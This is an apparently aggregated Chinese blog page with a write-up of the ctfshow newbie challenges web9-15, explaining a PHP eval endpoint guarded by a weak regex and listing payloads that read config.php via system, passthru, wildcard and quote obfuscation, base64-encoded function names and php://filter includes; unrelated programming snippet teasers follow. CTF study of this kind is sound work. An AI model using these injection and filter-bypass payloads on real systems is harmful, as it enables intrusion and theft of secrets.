当前位置：首页 > news >正文

【WEB】ctfshow-萌新-web9-15

news 2026/2/9 16:10:04

文章目录

题目介绍：
题目分析：
payload：

题目介绍：

ctfshow-萌新计划-web9-15

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){$c = $_GET['c'];if(preg_match("/system|exec|highlight/i",$c)){eval($c);}else{die("cmd error");}
}else{highlight_file(__FILE__);
}
?>

题目分析：

包含配置文件：
- include("config.php");
- 这行代码包含了一个名为config.php的文件，该文件可能包含一些配置信息，比如flag。
检查GET参数c是否存在：
- if(isset($_GET['c'])){ ... }
- 这段代码检查是否有通过GET方法提交的c参数。
获取c参数的值：
- $c = $_GET['c'];
- 将GET参数c的值赋给变量$c。
正则表达式匹配：
- if(preg_match("/system|exec|highlight/i",$c)){ ... }
- 使用preg_match函数检查变量$c是否包含system、exec或highlight这些字符串（不区分大小写）。这个正则表达式检查的目的是尝试防止某些特定的命令执行函数被调用。
执行代码：
- eval($c);
- 如果正则表达式匹配成功，eval函数将执行变量$c中包含的PHP代码。这是一个非常危险的操作，因为它允许执行任意PHP代码，可能导致严重的安全问题。
错误处理：
- die("cmd error");
- 如果正则表达式没有匹配，脚本将终止执行并输出错误信息。
高亮显示当前文件：
- highlight_file(__FILE__);
- 如果没有提交c参数，脚本将使用highlight_file函数显示当前脚本文件的源代码。

payload：

?c=system('cat config.php');?c=system('tac config.php');?c=show_source('config.php');?c=passthru('tac config.php');?c=passthru('more config.php');?c=passthru('more confi***hp');?c=passthru('tac con\fig*')?>?c=passthru('c""at con""fig?ph""p')?>?c=passthru("ca''t `ls`")?>?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);?c=$a=opendir('/var/www/html');$e=readdir($a);$e=readdir($a);$e=readdir($a);echo%20readfile($e);?c= include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php?c=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php?a=cat config.php&c=echo`$_REQUEST[a]`;……

我不会接受我不要的未来，哪怕是命中注定。

【WEB】ctfshow-萌新-web9-15

文章目录题目介绍：题目分析：payload： 题目介绍： ctfshow-萌新计划-web9-15 <?php # flag in config.php include("config.php"); if(isset($_GET[c])){$c $_GET[c];if(preg_match("/system|exec|highlight…...

编程日记 2024/8/1 14:06:49

【Vulnhub靶场AI-WEB-1.0打靶教程】

第一步：查看虚拟机的ip 第二步：扫描ip下开放的80端口第三步：扫描查到的ip地址下的目录第四步：访问查到的目录访问robot.txt 第五步:访问robot.txt显示出的目录第六步：打开kali终端，使用sqlmap功能 sq…...

编程日记 2024/8/1 14:04:47

html实现酷炫美观的可视化大屏(十种风格示例，附源码)

文章目录完整效果演示1.蓝色流线风的可视化大屏1.1 大屏效果1.2 大屏代码1.3 大屏下载 2.地图模块风的可视化大屏2.1 大屏效果2.2 大屏代码2.3 大屏下载 3.科技轮动风的可视化大屏3.1 大屏效果3.2 大屏代码3.3 大屏下载 4.蓝色海洋风的可视化大屏4.1 大屏效果4.2 大屏代码4.3 …...

编程日记 2024/8/1 14:02:44

【C++BFS算法二分查找】2812. 找出最安全路径

本文涉及知识点 CBFS算法 C二分查找 LeetCode2812. 找出最安全路径给你一个下标从 0 开始、大小为 n x n 的二维矩阵 grid ，其中 (r, c) 表示： 如果 grid[r][c] 1 ，则表示一个存在小偷的单元格如果 grid[r][c] 0 ，则表示一…...

编程日记 2024/8/1 14:01:43

轻触开关 KH-4.5X4.5X5.5H-STM

品　　牌： kinghelm(金航标) 厂家型号： KH-4.5X4.5X5.5H-STM 封装： SMD 商品毛重： 0.317克(g) 包装方式： 编带...

编程日记 2024/8/1 14:00:41

3.redis客户端

1.命令行客户端在安装redis的时候就已经安装好了，就是redis-cli redis-cli -h 127.0.0.1 -p 6379 -a 123456 -a 表示密码 -h 表示ip，不配置默认为本机 127.0.0.1 -p 表示端口，不配置默认为 6379 进入后可以输入ping，返回pong代表…...

编程日记 2024/8/1 13:59:40

Rust配置国内源，解决安装依赖慢问题

温馨提示：最新内容仅在原文更新。国内源使用字节的RsProxy https://rsproxy.cn/ 解决rust-analyzer加载时间过长(请参考本文) 配置环境变量 Mac export RUSTUP_DIST_SERVER"https://rsproxy.cn" export RUSTUP_UPDATE_ROOT"https://rsproxy.cn/r…...

编程日记 2024/8/1 13:58:39

AI学习指南机器学习篇- Q学习的参数与调优

AI学习指南机器学习篇- Q学习的参数与调优在强化学习领域中，Q学习是一种经典的算法，可以用来解决各种问题，包括游戏和机器人控制等。Q学习算法的性能很大程度上取决于一些重要的参数，例如学习率和折扣因子。本文将介绍这些参数的…...

编程日记 2024/8/1 13:57:38

《小迪安全》学习笔记02

域名默认存放目录和IP默认存放目录不一样。 IP地址是WWW文件里的，域名访问是WWW里的一个子目录里的（比如是blog）。 Nmap: Web源码拓展拿到一个网站的源码，要分析这几个方面↑。不同类型产生的漏洞类型也不一样在网站中&…...

编程日记 2024/8/1 13:56:37

C语言：自定义类型进阶（结构体、联合体、枚举）

自定义类型（结构体、联合体、枚举） 一、结构体（一）结构体的内存对齐1、结构体内存对齐规则（1）引子（2）offsetof 宏函数（3）内存对齐原理（4&#xff…...

编程日记 2024/8/1 13:55:36

SPSSAU | 最好最差权重BWM原理及案例实操分析

BWM（best-worse-method，最好最差法）是一种多准则决策方法，由Jafar Rezaei于2015年提出，其通常用于确定决策标准的权重。其原理是比如5个指标，如果以前AHP就需要5个指标两两的相对重要性数据。但是现在简化为…...

编程日记 2024/8/1 13:54:36

docker安装elasticsearch（es） docker官网 https://hub.docker.com/ https://www.cnblogs.com/balloon72/p/13177872.html 1、拉取最新项目elasticsearch docker pull elasticsearch:8.14.3lscpu 查看架构 2、构建环境 mkdir -p /data/elasticsear…...

编程日记 2024/8/1 13:53:35

02 RabbitMQ：下载安装

02 RabbitMQ：下载&安装 1. 下载&安装1.1. 官网1.2. Docker方式1.2.1. 下载镜像1.2.2. 启动1.2.3. 登录验证 1. 下载&安装 1.1. 官网 RabbitMQ: One broker to queue them all | RabbitMQ 1.2. Docker方式 1.2.1. 下载镜像 # docker pull 镜像名称[…...

编程日记 2024/8/1 13:52:32

mmcv库出现No module named ‘mmcv._ext

遇到 "No module named mmcv._ext" 这个错误通常意味着你的 Python 环境中缺少 mmcv 库的扩展模块 _ext。mmcv（MMDetection 训练工具箱的核心库）通常依赖于 _ext 模块来提供一些高性能的操作，这些操作是用 C/C 实现的，并…...

编程日记 2024/8/1 13:51:30

防止xss（跨站脚本攻击）

1、输出数据时进行转义：这是最基本的预防措施。确保在输出数据到HTML时对特殊字符进行适当的转义，以防止它们被解释为HTML或JavaScript代码。PHP中可以使用htmlspecialchars()、strip_tags()、htmlentities函数来实现这一点。 echo htmlspecialchars($d…...

编程日记 2024/8/1 13:50:29

django小型超市库存与销售管理系统-计算机毕业设计源码46608

摘要随着信息技术的快速发展，超市库存与销售管理面临着前所未有的挑战与机遇。为了提升超市的运营效率，优化库存管理，并增强销售数据的分析能力，我们基于Django框架设计并开发了一套小型超市库存与销售管理系统。该系统充分利用…...

编程日记 2024/8/1 13:48:28

项目实战_表白墙（简易版）

你能学到什么一个比较简单的项目：表白墙（简易版），浏览器：谷歌升级版将在下个博客发布效果如下正文说明我们是从0开始一步一步做这个项目的，里面的各种问题，我也会以第一人称视角来解…...

编程日记 2024/8/1 13:47:27

优化 Spring Boot 项目启动速度：高效管理大量 Bean 注入

个人名片 🎓作者简介：java领域优质创作者 🌐个人主页：码农阿豪 📞工作室：新空间代码工作室（提供各种软件服务） 💌个人邮箱：[2435024119@qq.com] 📱个人微信：15279484656 🌐个人导航网站：www.forff.top 💡座右铭：总有人要赢。为什么不能是我呢？专栏导…...

编程日记 2024/8/1 13:46:26

《LeetCode热题100》---＜5.普通数组篇六道＞

本篇博客讲解LeetCode热题100道普通数组篇中的六道题第一道：最大子数组和（中等） 第二道：合并区间（中等） 第一道：最大子数组和（中等） 法一：贪心算法 class So…...

编程日记 2024/8/1 13:45:25

【Hot100】LeetCode—169. 多数元素

目录题目1- 思路2- 实现⭐169. 多数元素——题解思路 3- ACM 实现题目原题连接：169. 多数元素 1- 思路定义两个变量一个是 count：维护当前元素的出现次数一个是 ret ：维护当前元素思路遍历整个数组**①如果 count 0 **&#xff…...

编程日记 2024/8/1 13:44:23

国防科技大学计算机基础课程笔记02信息编码

1.机内码和国标码国标码就是我们非常熟悉的这个GB2312,但是因为都是16进制，因此这个了16进制的数据既可以翻译成为这个机器码，也可以翻译成为这个国标码，所以这个时候很容易会出现这个歧义的情况； 因此，我们的这个国…...

编程新知 2026/2/8 4:37:15

微软PowerBI考试 PL300-选择 Power BI 模型框架【附练习数据】

微软PowerBI考试 PL300-选择 Power BI 模型框架 20 多年来，Microsoft 持续对企业商业智能 (BI) 进行大量投资。 Azure Analysis Services (AAS) 和 SQL Server Analysis Services (SSAS) 基于无数企业使用的成熟的 BI 数据建模技术。同样的技术也是 Power BI 数据…...

编程新知 2026/2/1 19:08:45

【磁盘】每天掌握一个Linux命令 - iostat

目录【磁盘】每天掌握一个Linux命令 - iostat工具概述安装方式核心功能基础用法进阶操作实战案例面试题场景生产场景注意事项【磁盘】每天掌握一个Linux命令 - iostat 工具概述 iostat（I/O Statistics）是Linux系统下用于监视系统输入输出设备和CPU使…...

编程新知 2025/9/30 16:39:11

Python如何给视频添加音频和字幕

在Python中，给视频添加音频和字幕可以使用电影文件处理库MoviePy和字幕处理库Subtitles。下面将详细介绍如何使用这些库来实现视频的音频和字幕添加，包括必要的代码示例和详细解释。环境准备在开始之前，需要安装以下Python库：…...

编程新知 2025/9/3 4:12:17

css3笔记（1）自用

outline: none 用于移除元素获得焦点时默认的轮廓线 broder:0 用于移除边框 font-size：0 用于设置字体不显示 list-style: none 消除<li> 标签默认样式 margin: xx auto 版心居中 width:100% 通栏 vertical-align 作用于行内元素 / 表格单元格&#xff…...

编程新知 2025/10/11 5:18:43